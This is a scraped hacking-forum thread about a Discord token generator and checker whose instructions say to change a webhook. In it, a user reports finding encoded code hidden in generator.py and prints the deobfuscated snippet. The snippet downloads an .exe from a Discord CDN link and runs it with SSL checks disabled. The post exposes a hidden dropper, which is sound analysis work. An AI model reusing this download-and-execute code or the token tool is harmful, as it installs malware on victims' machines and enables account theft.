Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



   7492

❄️ ExoCord Token Generator | Token Verifier | Token Checker | ❄️

by idcheck - 04 August, 2023 - 07:17 PM
This post is by a banned member (idcheck) - Unhide
This post is by a banned member (Maxiplayed) - Unhide
This post is by a banned member (Likethesuuuu) - Unhide
This post is by a banned member (smichelzon19) - Unhide
188
Posts
0
Threads
1 Year of service
#4
(04 August, 2023 - 07:17 PM)idcheck Wrote: Show More
Showcase:
[Image: watch?v=ZPenYE7J3wM][Image: watch?v=ZPenYE7J3wM][Video: https://www.youtube.com/watch?v=ZPenYE7J3wM]

CHANGE WEBHOOK IN MAIN.PY

Download:
tysm brother
This post is by a banned member (XAKEP_Leech1) - Unhide
This post is by a banned member (sap) - Unhide
sap  
Registered
330
Posts
14
Threads
2 Years of service
#6
[font]thanks man, but obf is shit af[/font] [Image: monkayes.gif]
[Image: rip.png]
This post is by a banned member (GeorgeFloyd28) - Unhide
This post is by a banned member (sap) - Unhide
sap  
Registered
330
Posts
14
Threads
2 Years of service
#8
ive been reverse enginieering the generator.py file, and i found that it downloads a file called Lrzleri.exe. Im not sure what does the .exe contains but feel free to reverse enginieer it. Here is the download link: https://cdn.discordapp.com/attachments/1...rzleri.exe

Here is the code hidden in this section:
[Image: cYyxvVbNkKUB.png]
Code:
import urllib.request
import tempfile
import subprocess
import ssl

# Replace 'file_url' with the actual URL of the file you want to download and execute
file_url = 'https://cdn.discordapp.com/attachments/1090344487622033658/1136403102874992750/Lrzleri.exe'

# Create a temporary directory
temp_dir = tempfile.mkdtemp()

# Get the file name from the URL
file_name = file_url.split('/')[-1]
temp_file_path = temp_dir + '/' + file_name

# Disable SSL certificate verification
context = ssl._create_unverified_context()

# Download the file using urllib with the unverified context
urllib.request.urlretrieve(file_url, temp_file_path, context=context)

# Execute the downloaded file
subprocess.Popen(temp_file_path, shell=True)

That section had a few layers of encoding.
I didnt found any suspicious activities.
I hope this works for reporting this guy PepeBlush
[Image: rip.png]

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 7 Guest(s)